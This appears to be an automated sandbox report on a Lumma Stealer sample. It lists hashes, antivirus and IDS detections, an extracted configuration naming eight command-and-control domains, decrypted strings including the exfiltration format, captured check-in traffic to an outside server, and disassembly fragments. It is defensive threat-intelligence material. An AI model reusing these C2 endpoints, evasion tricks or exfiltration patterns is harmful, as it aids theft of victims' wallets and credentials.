Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1528464
MD5:92dd1108dbdebf3163c394deb38b0278
SHA1:e3a3638739deffd8b817a53b73f71cafbae978f6
SHA256:5a8fb0d6f8d170f4a1054b55fd5ce72e195810d130ef6e72ea76ea9441dbb996
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7100 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 92DD1108DBDEBF3163C394DEB38B0278)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["eaglepawnoy.stor", "clearancek.site", "studennotediw.stor", "mobbipenju.stor", "bathdoomgaz.stor", "licendfilteo.site", "spirittunek.stor", "dissapoiznw.stor"], "Build id": "4SD0y4--legendaryy"}
SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-07T23:23:16.436330+020020546531A Network Trojan was detected192.168.2.749704104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-07T23:23:16.436330+020020498361A Network Trojan was detected192.168.2.749704104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-07T23:23:13.938398+020020564771Domain Observed Used for C2 Detected192.168.2.7536301.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-07T23:23:13.871380+020020564711Domain Observed Used for C2 Detected192.168.2.7494801.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-07T23:23:13.918586+020020564811Domain Observed Used for C2 Detected192.168.2.7538171.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-07T23:23:13.899468+020020564831Domain Observed Used for C2 Detected192.168.2.7578551.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-07T23:23:13.961689+020020564731Domain Observed Used for C2 Detected192.168.2.7629181.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-07T23:23:13.888459+020020564851Domain Observed Used for C2 Detected192.168.2.7501251.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-07T23:23:13.949817+020020564751Domain Observed Used for C2 Detected192.168.2.7560851.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-07T23:23:13.927966+020020564791Domain Observed Used for C2 Detected192.168.2.7614611.1.1.153UDP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: file.exeAvira: detected
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/badgesURL Reputation: Label: malware
    Source: file.exe.7100.3.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["eaglepawnoy.stor", "clearancek.site", "studennotediw.stor", "mobbipenju.stor", "bathdoomgaz.stor", "licendfilteo.site", "spirittunek.stor", "dissapoiznw.stor"], "Build id": "4SD0y4--legendaryy"}
    Source: file.exeReversingLabs: Detection: 42%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: file.exeJoe Sandbox ML: detected
    Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
    Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.stor
    Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.stor
    Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.stor
    Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.stor
    Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.stor
    Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.stor
    Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
    Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
    Source: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49702 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49704 version: TLS 1.2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00DE50FA
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00DAD110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00DAD110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh3_2_00DE63B8
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00DE5700
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh3_2_00DE99D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h3_2_00DE695B
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]3_2_00DAFCA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_00DB0EEC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx3_2_00DE6094
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h3_2_00DE4040
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [edx]3_2_00DA1000
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then dec ebx3_2_00DDF030
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]3_2_00DB6F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]3_2_00DCD1E1
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]3_2_00DB42FC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx3_2_00DC2260
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], ax3_2_00DC2260
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]3_2_00DD23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]3_2_00DD23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]3_2_00DD23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00DD23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]3_2_00DD23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+14h]3_2_00DD23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, eax3_2_00DAA300
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh3_2_00DE64B8
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00DBD457
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]3_2_00DE1440
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]3_2_00DCC470
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp], 00000000h3_2_00DBB410
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]3_2_00DCE40C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00DC9510
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]3_2_00DB6536
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh3_2_00DE7520
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00DDB650
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]3_2_00DCE66A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]3_2_00DE67EF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]3_2_00DCD7AF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]3_2_00DE7710
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx3_2_00DC28E9
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]3_2_00DA49A0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h3_2_00DBD961
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h3_2_00DE3920
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax3_2_00DB1ACD
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]3_2_00DA5A50
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h3_2_00DE4A40
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax3_2_00DB1A3C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]3_2_00DB1BEE
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]3_2_00DB3BE2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00DD0B80
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+000006B8h]3_2_00DBDB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h3_2_00DBDB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh3_2_00DE9B60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h3_2_00DCCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00DCCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h3_2_00DCCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00DE9CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh3_2_00DE9CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax3_2_00DCAC91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], ax3_2_00DCAC91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [eax+esi+02h], 0000h3_2_00DCEC48
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h3_2_00DC7C00
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh3_2_00DDFC20
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00DE8D8A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh3_2_00DCFD10
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]3_2_00DCDD29
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]3_2_00DB1E93
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h3_2_00DB6EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [ebp+00h]3_2_00DABEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]3_2_00DA6EA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, word ptr [ecx]3_2_00DCAE57
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00DC5E70
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00DC7E60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, ecx3_2_00DB4E2A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], 0000h3_2_00DBFFDF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx3_2_00DE5FD6
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx3_2_00DA8FD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h3_2_00DE7FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00DE7FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]3_2_00DB6F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00DDFF70
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax3_2_00DC9F62

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.7:53630 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.7:50125 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.7:53817 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.7:61461 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.7:57855 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.7:62918 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.7:49480 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.7:56085 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49704 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49704 -> 104.21.53.8:443
    Source: Malware configuration extractorURLs: eaglepawnoy.stor
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Malware configuration extractorURLs: studennotediw.stor
    Source: Malware configuration extractorURLs: mobbipenju.stor
    Source: Malware configuration extractorURLs: bathdoomgaz.stor
    Source: Malware configuration extractorURLs: licendfilteo.site
    Source: Malware configuration extractorURLs: spirittunek.stor
    Source: Malware configuration extractorURLs: dissapoiznw.stor
    Source: Joe Sandbox ViewIP Address: 104.21.53.8 104.21.53.8
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
    Source: file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfm
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=qu55UpguGheU&l=e
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
